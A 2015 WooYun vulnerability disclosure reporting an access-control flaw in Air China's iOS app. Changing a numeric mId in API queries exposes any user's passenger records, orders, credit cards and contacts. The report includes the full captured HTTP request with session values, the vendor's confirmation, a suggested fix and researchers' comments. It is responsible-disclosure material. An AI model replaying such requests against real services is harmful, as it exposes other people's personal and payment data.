当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0129189

漏洞标题:中国国际航空客户端存在严重设计缺陷可查看任意用户个人信息

相关厂商:中国国际航空股份有限公司

漏洞作者: 高小厨

提交时间:2015-07-25 11:50

修复时间:2015-09-13 00:22

公开时间:2015-09-13 00:22

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-07-25: 细节已通知厂商并且等待厂商处理中
2015-07-30: 厂商已经确认,细节仅向厂商公开
2015-08-09: 细节向核心白帽子及相关领域专家公开
2015-08-19: 细节向普通白帽子公开
2015-08-29: 细节向实习白帽子公开
2015-09-13: 细节向公众公开

简要描述:

国航果真是良心厂商,所以我又是来求20rank的,哈哈哈(这回的不是知音卡的了)

详细说明:

1、目标:中国国航IOS客户端
2、问题描述:查看乘机人信息、查看订单、查看信用卡、查看常用联系人信息多处存在越权。烦以mID的值为数值的查询信息的都存在越权,mID的值为字母的为测越权,你们可以内查下哈。
数据包如下:

POST https://m.airchina.com.cn:9061/worklight/apps/services/api/AirChina/iphone/query HTTP/1.1
Host: m.airchina.com.cn:9061
Cookie: WL_PERSISTENT_COOKIE=02bcd324-4183-4a8c-87dc-5b181cfd148e; JSESSIONID=0000Ohfh1gyATyODbP9WiCcY4up:-1
WL-Instance-Id: v8jn5s9eiahun1qdrcn4q2pjpp
x-wl-clientlog-model: iPhone4,1
Connection: keep-alive
X-Requested-With: XMLHttpRequest
Proxy-Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept-Language: zh-Hans
User-Agent: AirChina/3.0.3.3 (iPhone; iOS 7.0.4; Scale/2.00)/WLNativeAPI/6.3.0.0
Accept: */*
x-wl-platform-version: 6.3.0.0
x-wl-clientlog-appname: AirChina
x-wl-clientlog-env: iphone
x-wl-clientlog-appversion: 1.0
x-wl-clientlog-osversion: 7.0.4
Content-Type: application/x-www-form-urlencoded; charset=utf-8
x-wl-analytics-tracking-id: 7DF54E2E-8469-4F5C-BDE3-389B533073D8
x-wl-clientlog-deviceId: 942A18F1-5379-426C-BA5A-3EBF48A64438
Content-Length: 376
x-wl-app-version: 1.0
__wl_deviceCtx=Aqaxby_o_yh7pBAA&adapter=ACPassenger&compressResponse=true&isAjaxRequest=true&parameters=%5B
%7B%22req%22%3A%22%7B%5Cn++%5C%22mId%5C%22+%3A+%5C%221507248637728%5C%22%2C%5Cn++%5C%22type%5C%22+%3A+%5C
%221%5C%22%5Cn%7D%22%2C%22lang%22%3A%22zh_CN%22%2C%22token%22%3A
%2284d2dee26b85377bd993a412370b39ffc2c834fe0e9c59ca2edd84b09a6435dd%22%7D%5D&procedure=qryPassengers


国航1.png


漏洞证明:

国航2.png

国航常用联系人.png

国航订单.png

修复方案:

mID最后加密一下

版权声明:转载请注明来源 高小厨@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-07-30 00:20

厂商回复:

感谢对国航的系统安全的帮助和支持!如果还有,希望提供。

最新状态:

暂无


漏洞评价:

评论

  1. 2015-07-25 11:53 | 小龙 ( 普通白帽子 | Rank:1208 漏洞数:316 | 乌云有着这么一群人,在乌云学技术,去某数...)

    擦,ios的洞怎么那么多。。。不说了,刷WB换苹果

  2. 2015-07-25 11:54 | 高小厨 ( 普通白帽子 | Rank:814 漏洞数:74 | 不会吹牛的小二不是好厨子!)

    @小龙 你想多了,安卓的也有,这又不是逆向

  3. 2015-07-25 11:57 | 小龙 ( 普通白帽子 | Rank:1208 漏洞数:316 | 乌云有着这么一群人,在乌云学技术,去某数...)

    @高小厨 不是吧,http://zhidao.baidu.com/question/462443341.html我看安卓和ios的编程不一样,做出来的接口肯定也是不一样的,之前就有安卓xss被修复,ios的却出现了xss。。。

  4. 2015-07-25 12:01 | 高小厨 ( 普通白帽子 | Rank:814 漏洞数:74 | 不会吹牛的小二不是好厨子!)

    @小龙 但是逻辑缺陷都差不多,底层的肯定不一样

  5. 2015-07-25 12:18 | 1937nick ( 实习白帽子 | Rank:97 漏洞数:28 | 水能载舟,亦能煮粥。物尽其用,人尽其能。)

    不是逆向的话,一般漏洞是在于后面的id或参数 导致越权 然后他人数据就泄漏了

  6. 2015-07-25 13:14 | zeracker 认证白帽子 ( 核心白帽子 | Rank:1068 漏洞数:134 | 多乌云、多机会!微信公众号: id:a301zls ...)

    洞主明显是冲着核心+蓝v去的

  7. 2015-07-30 08:37 | 大师兄 ( 路人 | 还没有发布任何漏洞 | 每日必关注乌云)

    @高小厨 厨子自从注册后,特活跃。一出手就20rank。